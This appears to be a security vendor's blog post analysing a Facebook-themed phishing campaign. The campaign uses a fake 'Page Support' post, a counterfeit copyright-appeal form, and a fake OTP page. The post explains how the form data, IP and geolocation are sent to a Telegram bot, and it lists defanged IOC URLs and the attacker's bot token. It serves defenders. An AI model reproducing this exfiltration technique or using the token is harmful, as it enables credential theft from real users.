Meta-Phish: Facebook Infrastructure Used in Phishing Attack Chain

Meta has two of the largest social media platforms today, Facebook and Instagram. These platforms became the modern gateway for people not just to socialize and eavesdrop on the lives of famous personalities, but more importantly, to stay connected with their friends and loved ones. The sites also became effective channels for organizations to advertise and disseminate information. However, their global presence has made these social media sites an attractive avenue for cybercriminals to perform their nefarious deeds.

Trustwave SpiderLabs previously released two blogs about Facebook and Instagram phishing. The common denominator between these two articles is that we discuss the use of phony notifications which lure victims into thinking that they have allegedly committed a violation of terms. The victim must then make an appeal through a crafted phishing page to avoid losing access to their account. This social engineering tactic is not new, but cybercriminals are constantly innovating, creating ever more sophisticated ways to evade security controls and filters.

Recently, we came across another example that operates in the same vein, which we have dubbed Meta-Phish. A successful Meta-Phish attack could result in the loss of Personally Identifiable Information (PII), login credentials, and Facebook profile link.

Figure 1: Phishing email message

Instead of the usual phishing link to an external landing page, this mail sample is crafted with a link that points to an actual Facebook post. The content of this Facebook post appears legitimate because it uses a dummy ‘Page Support’ profile with the Facebook logo as its display picture. At first glance, the page looks legitimate, but the link provided in this post leads to an external domain.

Figure 2: Dummy ’Page Support’ profile page

The link in the post leads to this main phishing URL, hxxps://meta[.]forbusinessuser[.]xyz/main[.]php, which mimics Facebook’s copyright appeal page.

Figure 3: Fake Facebook Copyright Appeal page

Upon clicking the send button, any information entered in the form by unsuspecting victims will be sent to the cybercriminals, along with the victim’s client IP and geolocation information. Let’s look at the source code and see how this attack unfolds.

Inspecting the source code of main[.]php reveals a link to a JavaScript file which contains the function that will retrieve any information provided to its form when triggered.

Figure 4: main[.]php source code

Figure 5: index[.]js source code: Form value retrieval

Then, all the information retrieved will be sent to a Telegram account via a Telegram Bot API.

Figure 6: index[.]js source code: Telegram bot API call

All queries to this Telegram Bot API must be served over HTTPS and needs to be presented in this form: https://api.telegram[.]org/bot<token>/METHOD_NAME. From here, we can identify the unique token of the bot used in this attack: bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo.

Index.js also uses the external site ipinfo.io to harvest the victim’s client IP address and geolocation information. This information is also sent over to the cybercriminals via the Telegram Bot API.

Figure 7: Index[.]js source code: client IP and geolocation harvest

Figure 8: Client data harvested

Finally, the user is redirected to the next page checkpoint[.]php.

Figure 9: Index[.]js source code

In this redirection phishing page hosted on the URL, a fake One Time Password (OTP) check will take place.

Based on the code, any value that the user tries to input will only lead to an error message. However, there are several functions for the timer being set for the user to input the OTP required.

Figure 10: Phishing page with OTP request

Based on the code, any value that the user tries to input will only lead to an error message. However, there are several functions for the timer being set for the user to input the OTP required.

Figure 11: checkpoint[.]php source code

If the user tries to click the option ‘Need another way to authenticate?’, a message box will appear and provide some steps on what to do next. However, if the user tries to click ‘Get Code’, it will redirect to a legitimate Facebook site that requires a log-in.

Figure 12: ‘Need another way to authenticate page

The source code of checkpoint[.]php also reveals the use of Google Analytics with the specific ID: UA-177207786-1.

Figure 13: checkpoint[.]php source code

Google Analytics is a web analytics service that tracks and reports website traffic from the Google Marketing Platform brand.

The property ID is the identifier associated with the user account and is used by Google Analytics to collect data. The UA prefix stands for ‘Universal Analytics’, which is the current version of Google Analytics. The numbers that follow are the Google Analytics account ID. The postfix number is the index number of the property connected to the account. It is possible to have up to 50 properties connected to the same Google Analytics account, so the postfix can be from 1 to 50.

Figure 14: Google Analytics ID Structure

The Google Analytics property tracking ID can be used as a part of Global Site Tag, which is provided in the admin area of the account.

Looking up this Google Analytics ID in VirusTotal will resolve to several Facebook Phishing URLs which can also be used for threat hunting purposes.

Figure 15: Sample screenshot of VirusTotal search result using Google Analytics ID

During our research, we also discovered several other phony Facebook accounts that use this social engineering technique:

Figure 16: Fake Appeal Form page

Figure 17: Fake Account Restrictions page

Figure 18: Fake Social Network Violations page

Figure 19: Fake Page Recovery Notifications page

The majority of these URLs use free web hosting sites or short URL services that redirect to the destination phishing site. Some sites also use newly registered domains which are neither affiliated with Facebook, nor Instagram.

These type of posts or pages can be easily found by searching specific keywords like ‘appeal form’ in Facebook’s search text box:

Figure 20: Text box search for Appeal Form page

To wrap up, these fake Facebook ‘Violation’ notifications use real Facebook pages to redirect to external phishing sites. Users are advised to be extra careful when receiving false violation notifications and not to be fooled by the apparent legitimacy of the initial links.

IOCs

URLs

hxxps://www[.]facebook[.]com/01oix2/posts/102106376025783
hxxps://meta[.]forbusinessuser[.]xyz/?fbclid=123
hxxps://meta[.]forbusinessuser[.]xyz/main[.]php
hxxps://meta[.]forbusinessuser[.]xyz/checkpoint[.]php
hxxps://api[.]telegram[.]org/bot5213906361:AAEAYFxbgjU7aBqrUm3ufkkt8UybZP_Lnbo/